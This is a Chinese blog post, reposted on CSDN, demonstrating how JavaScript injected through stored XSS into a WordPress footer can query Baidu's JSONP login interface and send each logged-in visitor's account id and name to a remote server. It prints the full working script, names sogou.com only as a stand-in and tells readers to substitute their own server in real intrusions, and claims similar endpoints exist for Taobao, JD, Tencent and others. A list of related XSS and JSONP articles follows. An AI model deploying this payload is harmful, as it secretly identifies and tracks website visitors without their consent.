XSS结合JSONP获取网站访客社交账号信息

最新推荐文章于 2023-09-09 13:34:08 发布
最新推荐文章于 2023-09-09 13:34:08 发布
阅读量1k 收藏 1
点赞数
文章标签: javascript 前端 php ViewUI
原文链接:http://www.cnblogs.com/dgjnszf/p/10793535.html
版权

  我在本地环境搭建了一个WordPress网站,并在该网站中植入JavaScript文件。如果访客在浏览网站时登录了百度账号,该js文件能够利用JSONP获取网站访客的百度账号信息。

具体情况如下:

1、首先修改WordPress的footer.php文件,引入2个外部JavaScript文件。第一个是jQuery库,第二个是jsonp代码。在实际渗透中,如果该网站存在存储型XSS漏洞,我们就可以将xss_jsonp.js文件植入进去。

2、xss_jsonp.js文件内容如下,具体功能是通过JSONP获取百度账号信息,并上传到服务器上。为了做演示,这里我把获取到的信息上传到www.sogou.com,在实际渗透中,你可以把信息上传到自己的服务器上。

 1 function jsonp_baidu() {
 2     window._baidu_1 = function(object) {
 3     if(!object.id) {
 4         return;
 5     }
 6     var data = {};
 7     data.id = object.id;
 8     data.name = object.name;
 9     $.post(saveUrl + '?act=baidu', data);
10     };
11     $.ajax({
12         url: "https://baike.baidu.com/api/login/",
13         type: "GET",
14         dataType: "jsonp",
15         jsonp: 'callback',
16         jsonpCallback: "_baidu_1",
17     });
18 }  
19 var saveUrl = 'https://www.sogou.com/xss_jsonp.php';
20 jsonp_baidu();

3、访问网站并观察刚才植入的js代码是否执行。

访问百度的JSONP接口,服务器返回登录账号的相关信息。

获取到百度账号信息后,上传到www.sogou.com服务器。

 

  目前,我已经找到了百度、淘宝、京东、腾讯、新浪、爱奇艺等多个国内流行网站的JSONP接口,从这些接口可以获取用户账号信息。

 

转载于:https://www.cnblogs.com/dgjnszf/p/10793535.html

weixin_30265103
关注
蜜罐中利用jsonp跨域漏洞和xss漏洞的分析
HBohan的博客
02-12 1503
一、前言 我们在打红队的时候,经常会碰到蜜罐,而更有一些“主动防御”的蜜罐中利用到了一些网站的跨域漏洞和xss,对此进行简单分析。 二、蜜罐的概念 蜜罐主要是通过布置诱饵,诱使攻击者实施攻击,然后通过流量捕获、行为分析等对攻击者画像及溯源。 例如HFish蜜罐,属于高交互蜜罐,通过捕获攻击者行为,获取攻击者攻击数据、IP地址等,然而只是获取这些数据进行攻击者画像是远远不够的,而HFish也提供了自定义web蜜罐的部署,简单分析下碰到的两个蜜罐。 以下是红队和漏洞挖掘中碰到的两个蜜罐截图。 为什么说是“.
php反射型xss,利用反射型XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 761
目录结构一、测试环境二、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA二、测试目标:从...
详解JSON和JSONP劫持以及解决方法
10-17
主要介绍了详解JSON和JSONP劫持以及解决方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
JSONP获取Twitter和Facebook文章数
铁锚的CSDN博客
02-22 2631
原文链接: Retrieve Twitter and Facebook Counts with JSON 翻译人员: 铁锚 原文日期: 2014年02月19日 翻译日期: 2014年02月22日 !!! 原文是使用的Twitter和Facebook,因为国内被强,所以我觉得有用的是里面一个获取JSONP的那个工具类. 我很头疼的是,许多流行的 APIs 已经要求身份验证才能获取
xssjsonp的简单理解
aobeng7073的博客
09-20 229
xss:cross site script 跨站脚本 通过用户提交恶意脚本,所以要对用户提交进行编码 jsonp: 跨域请求,ajax不能跨域 src属性都能请求跨域内容,img、iframe和script标签;通过src传递内容给另一个域的服务器,它再根据内容,返回js代码。 转载于:https://www.cnblogs.com/miaolq/p/5890622.ht...
JS 使用 JSONP 跨域获取用户IP
一直专注于互联网
09-22 641
<!DOCTYPE html> <html lang="zh-cn"> <head> <meta charset="UTF-8"> <title></title> <script src="jquery-1.10.1.min.js">&
web蜜罐jsonp抓取信息探究
ATpiu的博客
05-16 2929
web蜜罐抓取攻击方信息(jsonhijack)研究
使用jsonp实现跨域获取数据实例讲解
11-27
在本文中,我们将深入理解JSONP的工作原理,并通过实例来演示如何使用JSONP获取跨域数据。 1. 同源策略:同源策略是浏览器为了安全考虑而设置的一项机制,它限制了脚本只能访问与当前页面具有相同协议(如HTTP或...
XSS漏洞利用---GET型XSS漏洞获取用户Cookie信息
Ethan024的博客
03-07 1181
** XSS漏洞利用(本文仅供技术学习与分享) ** GET型XSS漏洞获取用户Cookie信息 我们都知道XSS漏洞可以让浏览器弹框,但是不知道有什么实际的危害。下面我用皮卡丘靶场来做实验。 实验准备 皮卡丘平台为存在XSS漏洞平台的站点; 用户正常访问该站点; 攻击者搭建的,以供收集数据的后台(皮卡丘后台预备好了pkxss平台); 实验思路 攻击者在pkxss后台创建一个接收数据的接口; 攻击者在存在XSS漏洞的站点上插入恶意脚本; 正常的用户访问XSS页面,触发脚本;站点随即返回恶意JS的页面给
xss攻击获取mysql数据,XSS漏洞攻击教程:
weixin_42316952的博客
03-27 948
XSS分类:1.反射型XSS(非持久型);2.存储型XSS((持久型);3.DOM XSS(文档对象型).图片发自简书App图片发自简书App反射型XSS:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码,这个过程称为反射型XSS.反射型XSS简单例子:echo $_GET['x'];?>注:...
JSONP接口
wcgdecsdn的博客
11-08 361
jsonp请求
【笔记】通过jsonp方式获取用户ip地址
hamal_ye的博客
11-24 1602
此处用到第三方接口,有可能以后会失效:http://pv.sohu.com/cityjson 方式一:用ajax(不在第三方接口的白名单内,会跨域) $.ajax({ type: "GET", url: 'https://pv.sohu.com/cityjson', cache: false, async: false, dataType: "json", success: function (res) { alert(res);
jsonp解决跨域(案例:动态获取百度数据)
放手
07-24 374
jsonp了解一下,只要你看了,相信你就能懂! 首先我们先简单回忆一下ajax,ajax我们都不陌生,经常用,ajax的优点是不刷新整个页面从后台获取数据,但是也有缺点啊,不能跨域啊!但是好多时候我们还就得跨域请求数据。所以jsonp出场了。 必须清楚的一点,json和jsonp是没有任何关系的。jsonp是一种可以跨域获取数据的手段。 jsonp实现原理:动态创建script标签,在全局设置一个...
XSS盗取用户信息实验(详细)及xss之旅闯关
m0re's blog
05-29 1211
本文目录前言小实验实验环境实验实验过程xss之旅 前言 近段时间学习xss,进行了比较详细的了解,也学了一个小实验,感觉挺有意思,记录下来。然后,后面就是xss之旅的闯关。 小实验 实验环境 DVWA、kali linux、物理机或一台windows系统的虚拟机。 实验 实验原理: 克隆网站登录页面,利用存储xss设置跳转代码,如果用户访问即跳转到克隆网站的登录页面,用户输入登录,账号和密码被存储...
轻松搞定JSONP跨域请求
雷佳佳的博客
06-16 213
一、同源策略 要理解跨域,先要了解一下“同源策略”。所谓同源是指,域名,协议,端口相同。所谓“同源策略“,简单的说就是基于安全考虑,当前域不能访问其他域的东西。 一些常见的是否同源示例可参照下表: 在同源策略下,在某个服务器下的页面是无法获取到该服务器以外的数据的。 当出现跨域问题时会报错,如下: 但img的src(获取图片),link的href(获取css),script的src(获取jav...
通过蜜罐获取个人信息方式【仅提供网络安全研究】
最新发布
ta737的博客
09-09 600
随着攻防演练的不断开展,为了更好的进行溯源,很多企业都使用了蜜罐技术。
京东中关于jsonp的运用
weixin_33862993的博客
02-18 299
以商品详情页为例: 文件头部出现很多jsonp的调用:   对于这个jsonp的函数回调放在iplocation_server.js这个文件中 //stock callback function getProvinceStockCallback(result) { var stockdesc="<strong>现货</strong>"; if (res...
JSONP跨域详解 + 模拟百度搜索
m0_48375854的博客
12-08 921
JSONP是JSON with padding(填充式JSON或参数式JSON)的简写,是应用JSON的一种新方法,在后来的Web服务中非常流行,JSONP看起来与JSON差不多,只不过是被包含在函数中调用的JSON,就像下面这样: callback({"name": "王欢"}); JSONP由两部分组成:回调函数和数据。回调函数是当响应到来时应该在页面 中调用的函数。回调函数的名字一般是在请求中指定的。而数据就是传入回调函数中的JSON数据。下面就是一个典型的JSONP请求。 https://free
通过jsonp来实现跨域访问获取数据!!!
zqq232206的博客
06-05 2777
通过jsonp来实现跨域访问获取数据的原理是什么?通俗一点就是通过中的src来访问你想要获取数据的网址,并获取数据。(不要问这啥这样做就可以,没有那么多为什么,照着做就行了)。废话补多少,举例子 1创建一个script标签 src中的链接是你要访问的链接 2,在链接后面添加一个参数callback=handleResponse(handleResponse是一个回调函数名,可以自己定义)
理解XSS与CSRF:网站安全的威胁与防护
XSS攻击的危害广泛,包括但不限于窃取用户的敏感信息(如登录凭证、个人信息)、操控用户界面、劫持用户会话、传播恶意软件等。攻击者可以通过XSS漏洞获取用户的cookies,进一步实现身份冒充。为了防止XSS攻击,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值